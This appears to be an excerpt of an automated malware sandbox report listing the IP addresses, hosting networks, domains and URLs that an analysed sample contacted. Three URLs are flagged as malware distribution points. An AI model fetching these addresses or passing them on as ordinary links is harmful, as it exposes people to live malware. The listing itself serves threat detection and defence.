327979 DIAMATRIXZA true
173.212.193.249
 unknown Germany
51167 CONTABODE true
45.176.232.124
 unknown Colombia
267869 CABLEYTELECOMUNICACIONESDECOLOMBIASASCABLETELCOC true
178.79.147.66
 unknown United Kingdom
63949 LINODE-APLinodeLLCUS true
212.237.5.209
 unknown Italy
31034 ARUBA-ASNIT true
162.243.175.63
 unknown United States
14061 DIGITALOCEAN-ASNUS true
176.104.106.96
 unknown Serbia
198371 NINETRS true
207.38.84.195
 unknown United States
30083 AS-30083-GO-DADDY-COM-LLCUS true
164.68.99.3
 unknown Germany
51167 CONTABODE true
164.90.147.135
 hostfeeling.com United States
14061 DIGITALOCEAN-ASNUS true
192.254.71.210
 unknown United States
64235 BIGBRAINUS true
212.237.56.116
 unknown Italy
31034 ARUBA-ASNIT true
104.168.155.129
 unknown United States
54290 HOSTWINDSUS true
45.142.114.231
 unknown Germany
44066 DE-FIRSTCOLOwwwfirst-colonetDE true
203.114.109.124
 unknown Thailand
131293 TOT-LLI-AS-APTOTPublicCompanyLimitedTH true
209.59.138.75
 unknown United States
32244 LIQUIDWEBUS true
159.8.59.82
 unknown United States
36351 SOFTLAYERUS true
129.232.188.93
 unknown South Africa
37153 xneeloZA true
91.240.118.172
 unknown unknown
49453 GLOBALLAYERNL true
58.227.42.236
 unknown Korea Republic of
9318 SKB-ASSKBroadbandCoLtdKR true
158.69.222.101
 unknown Canada
16276 OVHFR true
104.251.214.46
 unknown United States
54540 INCERO-HVVCUS true

Contacted Domains

Name IP Active
hostfeeling.com 164.90.147.135 true
jurnalpjf.lan.go.id 103.206.244.105 true
windowsupdate.s.llnwi.net 178.79.242.0 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://91.240.118.172/gg/ff/fe.png true
  • Avira URL Cloud: malware
 unknown
http://jurnalpjf.lan.go.id/assets/iM/ true
  • Avira URL Cloud: malware
 unknown
http://91.240.118.172/gg/ff/fe.html true
  • Avira URL Cloud: malware
 unknown